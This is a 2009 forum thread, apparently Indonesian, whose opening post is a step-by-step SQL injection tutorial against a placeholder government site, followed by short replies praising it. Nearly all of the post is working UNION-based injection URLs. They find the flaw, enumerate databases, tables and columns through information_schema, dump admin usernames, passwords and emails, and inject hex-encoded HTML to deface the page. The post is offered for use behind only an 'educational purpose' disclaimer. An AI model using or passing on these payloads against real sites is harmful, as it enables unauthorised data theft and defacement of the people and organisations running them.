Page 1 of 2

[Tutorial] Advance SQL Injection

Posted: Sun Dec 13, 2009 11:46 am
by adwisatya
This paper is the advance of my first article. In this tutorial, we will try how to enter to the website deeper than normaly using SQL Injection.

1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the the site, is this site have bug. We only need to add single quote in last url. So the url be:
http://www.victim.gov/agent_detail.php?aid=9'
And error is appear.

2. We check number of column of that site.
To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl
UR:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear

because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear.

3. We check the number that can be exploitable.
We use "union all select"
UR:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3".

Number 3 appear. So 3 is exploitable number.

4. We check the version of that site.
We use "version()" . We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and appear:
5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column.

5. We check the user of that site.
We use "user()" . We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and appear:
root@localhost.
so the username is root.

6. We check the default database.
We use "database()" . We only need to replace the exploitable number with database()().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and appear: "news"
so the default database of that site is "news".

7. We check all of database in that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of database in that site. Example:
news
information_schema
mysql
cms
connection
shop
etc

8. We check the name of table of that site (default database).
This is query if you want see the table name of default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see table name of that database. Example:
admin
config
news
etc

9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E .
Example the table is "admin", so the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the name of column in that table. Example:
username
password
email
etc

10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email .
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the strusture:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email

We have learn how to dump from default database. So how about other database?

11. Check table_name of other database.
Example the other database is "cms"
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]" [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user

12. Check column_name of following tables
Example the table is "cms_order"
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
hex of "cms_order" is 636D735F6F72646572. So URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff

13. Dump data from following column.
Example the column_nane are order_id,order_reff
We use "concat(column_name,0x3a_column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order--
You will se the data :-) :-) :-) :-)

14. Fake deface using SQL injection
We only need convert html to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good :-D


The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO.
"bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri".

http://xyber-breaker.blogspot.com

Re: Advance SQL Injection

Posted: Sat Dec 19, 2009 3:24 pm
by komporgas
amazing

Re: Advance SQL Injection

Posted: Sat Dec 19, 2009 10:21 pm
by peniru
wuih.. ckckckck

Re: [Tutorial] Advance SQL Injection

Posted: Sun Dec 20, 2009 6:57 pm
by wiLMaR_kiDz
Ane dah prnah baca sih....He..
Keep share 0m... :kaca: :kaca:
lanjutkan prjalannya... :ngakak: :tapa:

Re: [Tutorial] Advance SQL Injection

Posted: Mon Dec 21, 2009 1:05 pm
by blabard
nebwe ikutan baca ya om...

Re: [Tutorial] Advance SQL Injection

Posted: Mon Dec 21, 2009 2:16 pm
by adwisatya
@wiLMaR_kiDz, baca dimana bro?

Re: [Tutorial] Advance SQL Injection

Posted: Mon Dec 21, 2009 4:55 pm
by wiLMaR_kiDz
adwisatya wrote:@wiLMaR_kiDz, baca dimana bro?
di : http://xyber-breaker.blogspot.com/2009/ ... ction.html
alias blogny ente om...
sorry deh, alnya ane gk cek dulu c.. :putusasa: :putusasa:
jd malluw....
:malumalu: :malumalu: :malumalu:

Re: [Tutorial] Advance SQL Injection

Posted: Mon Dec 21, 2009 5:00 pm
by abah
mantap om hajar sekalian

Re: [Tutorial] Advance SQL Injection

Posted: Tue Dec 22, 2009 5:04 am
by adwisatya
hhihihi,,

gak perlu malu om,, santai aja....
:-),,

kalau ada kekurangan, mohon ditambahkan ya..

Re: [Tutorial] Advance SQL Injection

Posted: Tue Dec 22, 2009 10:18 am
by 3xtr3m3b0y
abah wrote:mantap om hajar sekalian
Weleh si abah maux maen hajar aja, aya naon atuh abah teh...???
Ingat, abah teh udah tua, inget ma Kayla 'n Ummi aja di rumah abah...